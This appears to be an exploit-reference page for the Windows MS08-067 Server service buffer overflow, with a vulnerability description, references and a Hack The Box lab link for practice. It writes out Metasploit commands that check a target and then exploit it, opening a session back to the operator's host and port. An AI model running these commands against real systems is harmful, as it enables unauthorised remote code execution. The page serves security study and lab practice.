.. / MS08-067

Exploit for Microsoft Windows Server Service RPC Request Buffer Overflow - Unauthenticated Remote Code Execution (MS08-067, CVE-2008-4250)

Description:

The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka “Server Service Vulnerability.

Affected Products:

Proof of Concept

PoC exploit

Metasploit Module

Check with Metasploit

use exploit/windows/smb/ms08_067_netapi
set RHOSTS YOUR_TARGET
check
Copy

Exploit with Metasploit

use exploit/windows/smb/ms08_067_netapi
set RHOSTS YOUR_TARGET
set LHOST eth0
set LPORT 1337
run
Copy

Try the exploit in a lab environment:

Lab Machine Link
Hack The Box Legacy Go to Practice

References:

https://nvd.nist.gov/vuln/detail/CVE-2008-4250
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/ms08_067_netapi.md